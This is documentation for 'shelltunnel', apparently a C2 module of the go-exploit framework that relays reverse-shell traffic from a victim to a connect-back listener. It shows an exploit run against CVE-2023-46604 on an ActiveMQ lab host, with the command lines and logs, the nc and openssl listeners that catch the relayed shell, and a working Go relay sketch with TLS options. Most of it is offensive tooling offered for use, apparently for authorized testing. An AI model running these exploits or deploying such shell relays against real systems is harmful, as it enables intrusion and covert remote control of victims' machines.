Documentation
Overview
shelltunnel is a simple C2 that copies shell traffic between a reverse shell origin and a connectback server. It essentially allows for this setup:
    +-------+                      +--------------+                      +--------------+
    | Box 1 |                      |    Box 2     |                      |    Box 3     |
    | nc -l | <- shell traffic ->  | shell tunnel | <- shell traffic ->  | shell origin |
    +-------+                      +--------------+                      +--------------+
Where 'nc -l' is basically any C&C you want that accepts reverse shells, box 2 is the attacker box, and box 3 is the victim. In this example, go-exploit on box 2 (attacker box) can act as an egress for the reverse shell generated on the victim (box 3). The shell tunnel will just copy the traffic data between the two boxes (1 & 3). This is appealing over something like a socks5 proxy or more advanced tunneling because it simply works and requires, for the exploit dev, no extra work beyond generating the initial shell (via *ShellServer or a binary or whatever).
Usage example using an unencrypted reverse shell:
    albinolobster@mournland:~/initial-access/feed/cve-2023-46604$ ./build/cve-2023-46604_linux-arm64 -e -rhost 10.9.49.56 -lhost 10.9.49.192 -lport 1270 -httpAddr 10.9.49.192 -c2 ShellTunnel -shellTunnel.cbHost 10.9.49.12
    time=2024-10-28T15:05:21.600-04:00 level=STATUS msg="Starting listener on 10.9.49.192:1270"
    time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.56 port=61616 ssl=false "ssl auto"=false
    time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.192:1270"
    time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="HTTP server listening for 10.9.49.192:8080/TMURWfRGRdSZ"
    time=2024-10-28T15:05:23.603-04:00 level=STATUS msg=Connecting...
    time=2024-10-28T15:05:23.630-04:00 level=STATUS msg="Sending exploit"
    time=2024-10-28T15:05:23.656-04:00 level=STATUS msg="Sending payload"
    time=2024-10-28T15:05:23.675-04:00 level=STATUS msg="Sending payload"
    time=2024-10-28T15:05:23.757-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.56:48440"
    time=2024-10-28T15:05:23.758-04:00 level=SUCCESS msg="Connect back to 10.9.49.12:1270 success!"
    time=2024-10-28T15:05:28.633-04:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
Above, you can see we've exploited a remote ActiveMQ (10.9.49.56), caught a reverse shell, and connected it back to a listener at 10.9.49.12:1270. The shell there looks like this:
    parallels@ubuntu-linux-22-04-02-desktop:~$ nc -lvnp 1270
    Listening on 0.0.0.0 1270
    Connection received on 10.9.49.192 51478
    pwd
    /opt/apache-activemq-5.15.2
The tunnel can also catch and relay over TLS, or use a mix of plaintext and TLS on the two sides. For example, the command above can be updated like so:
    ./build/cve-2023-46604_linux-arm64 -e -rhost 10.9.49.56 -lhost 10.9.49.192 -lport 1270 -httpAddr 10.9.49.192 -c2 ShellTunnel -shellTunnel.cbHost 10.9.49.12 -shellTunnel.cbSSL -shellTunnel.sslListen
And the reverse shell can now be caught by openssl:
    parallels@ubuntu-linux-22-04-02-desktop:~$ openssl s_server -quiet -key key.pem -cert cert.pem -port 1270
    pwd
    /opt/apache-activemq-5.15.2
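To make the "just copy the traffic between the two boxes" behaviour above concrete, here is an added Go sketch of a relay with the same shape; it is not the shelltunnel package's own code. It accepts a caught shell, dials the connect-back host (over TLS when a tls.Config is set, mirroring ConnectBackSSL; wrapping the listener with tls.NewListener would mirror SSLShellServer) and copies bytes in both directions until either side closes. The Tunnel type, its fields and the pipe/handle/Serve names are assumptions, not the package's API.

```go
package main

import (
	"crypto/tls"
	"io"
	"log"
	"net"
)

// Tunnel holds the subset of shelltunnel.Server settings needed to relay (assumed type).
type Tunnel struct {
	ConnectBackAddr string      // host:port of the C2 ("nc -l" in the diagram)
	ConnectBackTLS  *tls.Config // non-nil: TLS towards the C2 (like ConnectBackSSL)
}
// pipe copies bytes in both directions and returns once either side closes.
func pipe(shell, c2 net.Conn) {
	done := make(chan struct{}, 2)
	oneWay := func(dst, src net.Conn) {
		io.Copy(dst, src) // returns on EOF or error from either side
		dst.Close()       // propagate the close so the other copier unblocks
		done <- struct{}{}
	}
	go oneWay(c2, shell)
	go oneWay(shell, c2)
	<-done
}
// handle opens the connect-back connection for one caught shell and relays it.
func (t *Tunnel) handle(shell net.Conn) {
	defer shell.Close()
	dial := net.Dial
	if t.ConnectBackTLS != nil { // ConnectBackSSL: encrypt the hop to the C2
		dial = func(n, a string) (net.Conn, error) { return tls.Dial(n, a, t.ConnectBackTLS) }
	}
	c2, err := dial("tcp", t.ConnectBackAddr)
	if err != nil {
		log.Printf("connect back to %s failed: %v", t.ConnectBackAddr, err)
		return
	}
	pipe(shell, c2)
}
// Serve accepts shells on ln; wrap ln with tls.NewListener for SSLShellServer.
func (t *Tunnel) Serve(ln net.Listener) error {
	for {
		shell, err := ln.Accept()
		if err != nil {
			return err
		}
		go t.handle(shell)
	}
}
```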
Index
Constants
This section is empty.
Variables
    var (
    	ErrTLSListener = errors.New("tls listener init")
    )
Functions
This section is empty.
Types
type Server
    type Server struct {
    	// the TCP listener that will accept all the connections
    	Listener net.Listener
    	// the server address/hostname to tunnel the data to
    	ConnectBackHost string
    	// the server port to tunnel the data to
    	ConnectBackPort int
    	// indicates if we should use an encrypted tunnel to the server
    	ConnectBackSSL bool
    	// indicates if we should be listening as an SSL server
    	SSLShellServer bool
    	// The file path to the user provided private key (if provided)
    	PrivateKeyFile string
    	// The file path to the user provided certificate (if provided)
    	CertificateFile string
    	// contains filtered or unexported fields
    }
func GetInstance
    func GetInstance() *Server
func (*Server) CreateFlags
    func (shellTunnel *Server) CreateFlags()